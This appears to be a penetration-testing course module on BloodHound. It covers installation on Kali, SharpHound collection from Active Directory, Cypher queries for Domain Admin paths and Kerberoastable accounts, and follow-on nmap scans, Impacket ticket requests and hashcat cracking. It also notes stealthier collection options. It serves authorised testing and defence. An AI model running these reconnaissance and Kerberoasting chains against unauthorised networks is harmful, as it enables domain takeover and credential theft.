Intelligence Brief: At a Glance


    .--.
   |o_o |
   |:_/ |
  //   \ \
 (|     | )
/'\_   _/`\
\___)=(___/


Initial Engagement: Installation & Verification


This section covers the installation and initial setup of the BloodHound Community Edition on a Kali Linux system. All actions must be performed on a system you own or have explicit authorization to modify.


Objective: Check for Existing Installation


Command:

Bash

which bloodhound

Command Breakdown:

Ethical Context & Use-Case: Before installing new software, it is a standard best practice to verify if it already exists on the system. This prevents potential conflicts with existing versions or package management issues.

--> Expected Output:

/usr/bin/bloodhound

(Note: If BloodHound is not installed, this command will produce no output.)
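
You can also ask the package manager directly which version (if any) is installed and what the repositories currently offer:

Bash

apt-cache policy bloodhound

(An "Installed: (none)" line confirms a clean system; any other value tells you exactly what apt would upgrade.)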


Objective: Update Package Lists and Install BloodHound


Command:

Bash

sudo apt update && sudo apt install -y bloodhound

Command Breakdown:

Ethical Context & Use-Case: This is the standard, secure procedure for installing software from the official Kali Linux repositories. Keeping package lists updated ensures you are installing the latest stable and patched version of the tool, which is critical for security professionals.

--> Expected Output:

Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
...
The following NEW packages will be installed:
  bloodhound
...
Setting up bloodhound (7.3.1) ...
...


Objective: Run Initial BloodHound Setup


Command:

Bash

sudo bloodhound-setup

Command Breakdown:

Ethical Context & Use-Case: BloodHound requires several backend services to function. This one-time setup script correctly configures and initializes the database environment, ensuring the application runs correctly. This must be done before the first use.

--> Expected Output:

[*] Starting PostgreSQL service
[*] Creating Database
...
[*] Starting neo4j
...
Starting Neo4j.
Started neo4j (pid:12345). It is available at http://localhost:7474
...
[i] You need to change the default password for neo4j
    Default credentials are user:neo4j password:neo4j
[!] IMPORTANT: Once you have setup the new password, please update /etc/bhapi/bhapi.json with the new password before running bloodhound
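
If the setup output differs from the above, you can check the backend services directly. A quick sketch, assuming they are managed by systemd as on a default Kali installation:

Bash

systemctl status neo4j postgresql --no-pager

(Both units should report as active; if not, review the bloodhound-setup output for errors before continuing.)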


Objective: Configure Neo4j and BloodHound API


Ethical Context & Use-Case: Following the bloodhound-setup script, you must perform a critical security step: changing default credentials. In a professional engagement, leaving default credentials is a significant security flaw. The process involves accessing the Neo4j web interface, changing the password, and then updating the BloodHound configuration file to use this new password.

Step 1: Change Neo4j Password

  1. Open a web browser and navigate to http://localhost:7474.

  2. Log in with the default credentials: neo4j / neo4j.

  3. You will be forced to change the password. Enter a new, strong password and record it securely.

[VISUAL OUTPUT: A screenshot of the Neo4j browser interface showing the login screen, followed by the password change prompt.]
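
If you prefer to stay in the terminal, the same password change can be scripted with cypher-shell; a sketch assuming the client was installed alongside Neo4j and that Bolt is listening on its default port 7687 (substitute your own strong password):

Bash

cypher-shell -a bolt://localhost:7687 -d system -u neo4j -p neo4j "ALTER CURRENT USER SET PASSWORD FROM 'neo4j' TO 'YourNewStrongPassword';"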

Step 2: Update BloodHound API Configuration

Command:

Bash

sudo vim /etc/bhapi/bhapi.json

Command Breakdown:

Action: Inside the file, locate the line "secret": "neo4j" and change "neo4j" to the new, strong password you just set for the Neo4j database. Save and close the file.
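
For a non-interactive alternative to editing the file in vim, the same change can be scripted; a sketch that assumes the key appears exactly as "secret": "neo4j" and uses NewStrongPassword as a stand-in for your real password:

Bash

sudo sed -i 's/"secret": "neo4j"/"secret": "NewStrongPassword"/' /etc/bhapi/bhapi.json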


Objective: Run BloodHound and Set Admin Password


Command:

Bash

sudo bloodhound

Command Breakdown:

Ethical Context & Use-Case: This command starts the main BloodHound application. On the first run, you will be prompted to log in with the default application credentials (admin/admin) and immediately change the password for the BloodHound user interface.

--> Expected Output: The terminal will show service startup logs. You should then see a login prompt in the BloodHound UI. After logging in with admin/admin, you will be prompted to set a new password for the application's admin user.

[VISUAL OUTPUT: A screenshot of the BloodHound GUI login page prompting for a username and password.]
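
Before opening a browser, you can confirm the web interface is actually serving; a quick probe, assuming BloodHound CE uses its default UI port of 8080:

Bash

curl -s -o /dev/null -w '%{http_code}\n' http://localhost:8080/ui/login

(A 200 response means the login page is up; a connection error means the services have not finished starting.)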


Objective: View BloodHound Help Menu


Command:

Bash

bloodhound -h

Command Breakdown:

Ethical Context & Use-Case: Viewing the help menu is a fundamental step in understanding a tool's capabilities and available command-line options. It provides a quick reference for syntax and functionality.

--> Expected Output:

It seems it's the first time you run bloodhound

Please run bloodhound-setup first

(Note: If setup is complete, it will show command-line options, though most interaction is via the GUI.)


Tactical Operations: Core Commands & Use-Cases


BloodHound's power is unlocked in a two-stage process: data collection from the target environment and subsequent analysis within the GUI. This section covers both stages. All data collection examples must only be run against a target Active Directory environment for which you have explicit, written permission to perform security testing.


Sub-Section: Data Collection with SharpHound


SharpHound is the official data collector for BloodHound, typically run from a Windows machine within the target AD domain.


Objective 1: Default Data Collection


Command (run on a Windows host in the target domain):

PowerShell

.\SharpHound.exe

Command Breakdown:

Ethical Context & Use-Case: The default collection method gathers most of the critical AD objects and relationships (users, groups, computers, sessions, local admins, GPOs) without being overly noisy. This is the most common starting point for a BloodHound analysis in a penetration testing engagement.

--> Expected Output:

2025/08/17 14:35:00 | SharpHound 2.0.0 | FINISHED | 00:05:12.6789123
2025/08/17 14:35:00 | Zip file created at C:\Path\To\20250817143500_BloodHound.zip

[A ZIP file containing several JSON files will be created in the same directory as SharpHound.exe.]
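
Before uploading, it is worth confirming the archive actually contains the expected JSON files. Using the file name from the run above:

Bash

unzip -l 20250817143500_BloodHound.zip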


Objective 2: Collect All Possible Data


Command:

PowerShell

.\SharpHound.exe -c All

Command Breakdown:

Ethical Context & Use-Case: When a deep and thorough analysis is required, the All collection method provides the most comprehensive dataset. This is useful for detailed security audits but can be more network-intensive and generate more logs, potentially alerting defenders. This must be used with care and full awareness of the engagement's rules.

--> Expected Output:

2025/08/17 14:40:00 | SharpHound 2.0.0 | Starting Collection Method: All
... (extensive logging of collected objects) ...
2025/08/17 14:55:00 | SharpHound 2.0.0 | FINISHED | 00:15:00.1234567
2025/08/17 14:55:00 | Zip file created at C:\Path\To\20250817145500_BloodHound.zip


Objective 3: Collect Session Data Only


Command:

PowerShell

.\SharpHound.exe -c Session

Command Breakdown:

Ethical Context & Use-Case: Collecting only session data is a stealthier approach. It focuses on finding where high-privilege users are currently logged on, which is a key piece of information for planning lateral movement. This method is faster and generates significantly less network traffic than a full collection.

--> Expected Output:

2025/08/17 15:00:00 | SharpHound 2.0.0 | Starting Collection Method: Session
... (logging session enumeration) ...
2025/08/17 15:02:00 | SharpHound 2.0.0 | FINISHED | 00:02:00.9876543
2025/08/17 15:02:00 | Zip file created at C:\Path\To\20250817150200_BloodHound.zip


Objective 4: Specify Domain Controller


Command:

PowerShell

.\SharpHound.exe --DomainController DC01.corp.local

Command Breakdown:

Ethical Context & Use-Case: In a large environment with many Domain Controllers, you may want to target a specific one to reduce load on others or to pull data from a DC you know is accessible. This can also be a stealth measure to concentrate traffic towards a single source, which might be less suspicious than querying multiple DCs across the network.

--> Expected Output:

2025/08/17 15:05:00 | SharpHound 2.0.0 | Using Domain Controller: DC01.corp.local
... (logging default collection) ...
2025/08/17 15:10:00 | SharpHound 2.0.0 | FINISHED | 00:05:00.1122334
2025/08/17 15:10:00 | Zip file created at C:\Path\To\20250817151000_BloodHound.zip

(SharpHound supports many more options than shown here, covering LDAP throttling, OU filtering, JSON output formatting, and data import and clearance in the GUI; consult SharpHound's help output for the full list. We now proceed to the analysis stage.)


Sub-Section: Analysis via GUI & Custom Cypher Queries


Once data is collected with SharpHound and uploaded to the BloodHound GUI (via the "Upload Data" button), the real analysis begins. The following examples represent queries run in the "Raw Query" bar at the bottom of the UI.


Objective 5: Find All Domain Admins


GUI Action/Cypher Query:

Cypher

MATCH (u:User)-[:MemberOf*1..]->(g:Group) WHERE g.name = 'DOMAIN ADMINS@CORP.LOCAL' RETURN u,g

Query Breakdown:

Ethical Context & Use-Case: Identifying Domain Admins is the primary objective in most internal Active Directory penetration tests. This query maps out every user who holds these high-level privileges, either directly or through nested group membership. For a defender, this helps audit and minimize the number of accounts with ultimate control.

[VISUAL OUTPUT: A graph diagram in the BloodHound UI. A central node representing the "DOMAIN ADMINS" group is visible. Multiple user nodes are connected to it via "MemberOf" edges, some directly, some through other intermediate group nodes.]


Objective 6: Find Kerberoastable Users


Cypher Query:

Cypher

MATCH (u:User) WHERE u.serviceprincipalname IS NOT NULL AND u.dontreqpreauth = false RETURN u.name

Query Breakdown:

Ethical Context & Use-Case: Kerberoasting is a common attack in which an attacker requests a service ticket (TGS) for any account with an SPN. A portion of that ticket is encrypted with a key derived from the service account's password (its NTLM hash for RC4 tickets), so it can be taken offline and cracked. This query identifies all user accounts exposed to this attack, allowing a pen tester to demonstrate risk and a defender to remediate it (e.g., with long, random passwords or Group Managed Service Accounts).

[VISUAL OUTPUT: A list of usernames is displayed in the BloodHound results pane. In the graph view, all the identified user nodes are highlighted.]
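
BloodHound only identifies these accounts; the TGS tickets themselves must be requested with another tool (see the Strategic Campaigns section) before cracking. A minimal offline-cracking sketch, assuming RC4 (etype 23) hashes saved to tgs_hashes.txt and the standard Kali wordlist:

Bash

hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt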


Objective 7: Find Shortest Path to Domain Admins from a Specific User


GUI Action/Cypher Query: This is typically done via the GUI's pathfinding feature.

  1. Search for the starting user (e.g., LOWPRIV.USER@CORP.LOCAL) in the search bar and select it.

  2. Search for the target group (DOMAIN ADMINS@CORP.LOCAL) and select it.

  3. Click the "Pathfinding" icon (looks like two nodes with a path between them).

The underlying Cypher query is complex, but the abstract version is:

Cypher

MATCH p = shortestPath((n1)-[*1..]->(n2)) WHERE n1.name = 'LOWPRIV.USER@CORP.LOCAL' AND n2.name = 'DOMAIN ADMINS@CORP.LOCAL' RETURN p

Query Breakdown:

Ethical Context & Use-Case: This is the core function of BloodHound. Starting from a compromised low-privilege user, this visualizes the exact chain of relationships (e.g., the user is a member of a group, that group has admin rights on a machine, a Domain Admin has an active session on that machine) that can be exploited to escalate privileges to Domain Admin. This provides a clear, actionable roadmap for both an attacker's lateral movement and a defender's remediation strategy.

[VISUAL OUTPUT: A visual graph showing a chain of nodes and edges. It starts with the "LOWPRIV.USER" node, connects through several intermediate computer and group nodes, and ends at the "DOMAIN ADMINS" group node. Each edge is labeled with the specific permission, e.g., "AdminTo", "MemberOf", "HasSession".]

(Further Cypher queries follow the same pattern and can surface unconstrained delegation, constrained delegation, ACL abuse paths, GPO abuse, AS-REP roasting, DCSync rights, and more.)


Strategic Campaigns: Advanced Command Chains


BloodHound's data can be exported and integrated with other tools to create powerful testing and analysis workflows. The data is typically exported from the GUI by right-clicking in the results pane and selecting "Export as CSV/JSON".


Objective 1: Find and Scan Hosts with Domain Admin Sessions


Command Chain:

  1. In BloodHound GUI: Run a query to find computers with DA sessions.

    Cypher

    MATCH (c:Computer)<-[:HasSession]-(u:User)-[:MemberOf*1..]->(g:Group) WHERE g.name = 'DOMAIN ADMINS@CORP.LOCAL' RETURN DISTINCT c.name
    
  2. Export: Export the list of computer names to a file named da_hosts.txt (if the GUI hands you CSV rather than plain text, see the conversion sketch below).

  3. In Kali Terminal: Use the list with Nmap for a targeted port scan.

    Bash

    sudo nmap -iL da_hosts.txt -p- --open -oN nmap_da_hosts.txt
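
If the export in step 2 arrives as CSV rather than plain text, a small conversion keeps Nmap's -iL input happy; a sketch assuming a single-column CSV with a header row (adjust the field number for your export):

Bash

tail -n +2 da_hosts.csv | cut -d',' -f1 | tr -d '"' > da_hosts.txt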
    

Command Breakdown:

Ethical Context & Use-Case: This workflow efficiently combines BloodHound's high-level AD analysis with Nmap's network-level host analysis. After identifying high-value targets (machines where DAs are logged in), the ethical hacker can perform a detailed port scan to find potential services to exploit for lateral movement or remote code execution, providing a much more focused and less noisy approach than scanning the entire network.

--> Expected Output:

Starting Nmap 7.92 ( https://nmap.org ) at 2025-08-17 15:30 PKT
Nmap scan report for DC01.CORP.LOCAL (192.168.1.10)
Host is up (0.0010s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
...
3389/tcp  open  ms-wbt-server

Nmap scan report for SRV-APP01.CORP.LOCAL (192.168.1.55)
Host is up (0.0012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
445/tcp open  microsoft-ds
...

Nmap done: 2 IP addresses (2 hosts up) scanned in 15.78 seconds


Objective 2: Export Kerberoastable Targets with jq


Command Chain:

  1. In BloodHound GUI: Run the Kerberoastable query, returning the full user nodes (e.g., RETURN u rather than RETURN u.name), and export the results as JSON to a file named kerberoastable.json.

  2. In Kali Terminal: Use jq to parse the JSON and extract a clean list of target usernames.

    Bash

    jq -r '.data[].Properties.samaccountname' kerberoastable.json > kerberoastable_users.txt
    

    (Note: This assumes you have another tool like Impacket's GetUserSPNs.py to actually request and export the TGS hashes. This chain focuses on extracting the usernames from BloodHound's output.)

Command Breakdown:

Ethical Context & Use-Case: While BloodHound identifies vulnerable accounts, it doesn't perform the attack. This workflow demonstrates how an ethical hacker can systematically export the list of targets from BloodHound and prepare it for use with other tools (like Impacket or Rubeus) that will actually perform the Kerberoast attack. This separation of reconnaissance and exploitation is a key part of a structured penetration test.

--> Expected Output:

svc_sql
svc_iis
svc_backup
admin_backup
...

(The file kerberoastable_users.txt now contains a clean list of usernames.)
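
From here the actual ticket requests can proceed. A sketch using Impacket's GetUserSPNs.py, with hypothetical lab values (the lowpriv.user account and DC IP from earlier in this brief; the password is a placeholder):

Bash

GetUserSPNs.py corp.local/lowpriv.user:'Password123!' -dc-ip 192.168.1.10 -request -outputfile tgs_hashes.txt

(GetUserSPNs.py enumerates SPN accounts itself over LDAP; the BloodHound-derived kerberoastable_users.txt is useful for cross-checking its results. The output file feeds directly into the hashcat example from the analysis section.)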

(Similar chains can combine BloodHound exports with awk, sed, or short scripts to automate recurring analysis.)


AI Augmentation: Integrating with Artificial Intelligence


BloodHound provides raw graph data. By exporting this data, we can leverage Python libraries like Pandas and NetworkX to perform advanced, AI-driven analysis that goes beyond the built-in GUI queries.


Objective 1: Export and Load Graph Data for Analysis


Code (Python Script):

Python

import pandas as pd
import json

# Objective: Export users and groups from BloodHound as JSON,
# then load them into Pandas DataFrames for analysis.

# Step 1: In BloodHound, run 'MATCH (n:User) RETURN n' and 'MATCH (n:Group) RETURN n'
# and export both results to 'users.json' and 'groups.json' respectively.

# Step 2: Use this Python script to load the data.
def load_bloodhound_json(filepath):
    """Loads exported BloodHound JSON into a Pandas DataFrame."""
    with open(filepath, 'r') as f:
        data = json.load(f)
    
    # Assumed export shape: {"data": [{"n": {"properties": {...}}}, ...]};
    # adjust these keys if your BloodHound version exports a different layout.
    records = [item['n']['properties'] for item in data['data']]
    return pd.DataFrame.from_records(records)

users_df = load_bloodhound_json('users.json')
groups_df = load_bloodhound_json('groups.json')

print("Users DataFrame Info:")
users_df.info()
print("\nGroups DataFrame Info:")
groups_df.info()

print("\nFirst 5 Users:")
print(users_df.head())

Code Breakdown:

Ethical Context & Use-Case: The BloodHound GUI is excellent for visualization, but for large-scale, programmatic analysis, the data needs to be in a structured format. This script is the first step in any AI-augmented workflow: extracting the data from BloodHound's proprietary format into a universally usable structure like a Pandas DataFrame. This enables security auditors and data scientists to build custom analysis and reporting tools.

--> Expected Output:

Users DataFrame Info:
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1542 entries, 0 to 1541
Data columns (total 15 columns):
 #   Column              Non-Null Count  Dtype
---  ------              --------------  -----
 0   name                1542 non-null   object
 1   domain              1542 non-null   object
 2   enabled             1542 non-null   bool
...
 14  pwdlastset          1500 non-null   float64
dtypes: bool(1), float64(1), object(13)
memory usage: 182.2+ KB

Groups DataFrame Info:
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 215 entries, 0 to 214
Data columns (total 5 columns):
 #   Column      Non-Null Count  Dtype 
---  ------      --------------  ----- 
 0   name        215 non-null    object
 1   domain      215 non-null    object
...
 4   description 150 non-null    object
dtypes: object(5)
memory usage: 8.5+ KB

First 5 Users:
                       name      domain  enabled  ...
0  ADMINISTRATOR@CORP.LOCAL  CORP.LOCAL     True  ...
1          GUEST@CORP.LOCAL  CORP.LOCAL    False  ...
2         KRBTGT@CORP.LOCAL  CORP.LOCAL    False  ...
3       JOHN.DOE@CORP.LOCAL  CORP.LOCAL     True  ...
4        SVC_SQL@CORP.LOCAL  CORP.LOCAL     True  ...


Objective 2: Identify "Most Powerful" Nodes with Pandas


Code (Python Script):

Python

import pandas as pd
import json

# Prerequisite: Exporting 'AllShortestPathsToDA.json' from BloodHound.
# Query: MATCH p = allShortestPaths((n)-[*1..]->(g:Group)) WHERE g.name='DOMAIN ADMINS@CORP.LOCAL' RETURN p

with open('AllShortestPathsToDA.json', 'r') as f:
    data = json.load(f)

# Flatten the nested path data and count node appearances
node_counts = {}
for path_data in data['data']:
    path_nodes = path_data['p']['nodes']
    for node in path_nodes:
        # Exports may serialize nodes as dicts or as raw JSON strings,
        # so handle both shapes when extracting the node name.
        if isinstance(node, dict):
            name = node.get('properties', {}).get('name')
        else:
            try:
                name = node.split('"name":"')[1].split('"')[0]
            except IndexError:
                name = None
        if name:
            node_counts[name] = node_counts.get(name, 0) + 1

# Convert to a Pandas Series for easy sorting
choke_points = pd.Series(node_counts).sort_values(ascending=False)

print("Top 10 High-Impact Choke Points to Domain Admin:")
print(choke_points.head(10))

Code Breakdown:

Ethical Context & Use-Case: This script automates the identification of "choke points." Nodes (users, groups, or computers) that appear in many different attack paths to Domain Admins are the most critical assets to protect. By programmatically counting node appearances, a blue team can use this data-driven approach to prioritize remediation: hardening the top ten choke points breaks the largest number of potential attack paths, giving the highest return on investment for defensive effort.

--> Expected Output:

Top 10 High-Impact Choke Points to Domain Admin:
IT_ADMINS@CORP.LOCAL          152
SRV-HELPDESK@CORP.LOCAL       121
HELPDESK_TIER1@CORP.LOCAL     115
DC_ADMINS@CORP.LOCAL           98
PC012345.CORP.LOCAL            76
JANE.SMITH@CORP.LOCAL          65
BACKUP_OPERATORS@CORP.LOCAL    54
SRV-WSUS.CORP.LOCAL            49
GPO_LOCAL_ADMINS@CORP.LOCAL    41
DOMAIN ADMINS@CORP.LOCAL       35
dtype: int64


Legal & Ethical Disclaimer


The information provided in this course is for educational purposes only and is intended for use in legally authorized and ethical cybersecurity activities. The tools and techniques described herein should only be used in professional contexts such as authorized penetration testing, vulnerability assessments, and security audits on systems that you own or have explicit, written permission to test from the system owner.

Unauthorized access to computer systems or networks is illegal and subject to civil and criminal penalties. The course creator, instructor, and the Udemy platform bear no responsibility or liability for any individual's misuse or illegal application of this information. By proceeding with this course, you acknowledge your responsibility to adhere to all applicable laws and to act in a strictly ethical and professional manner.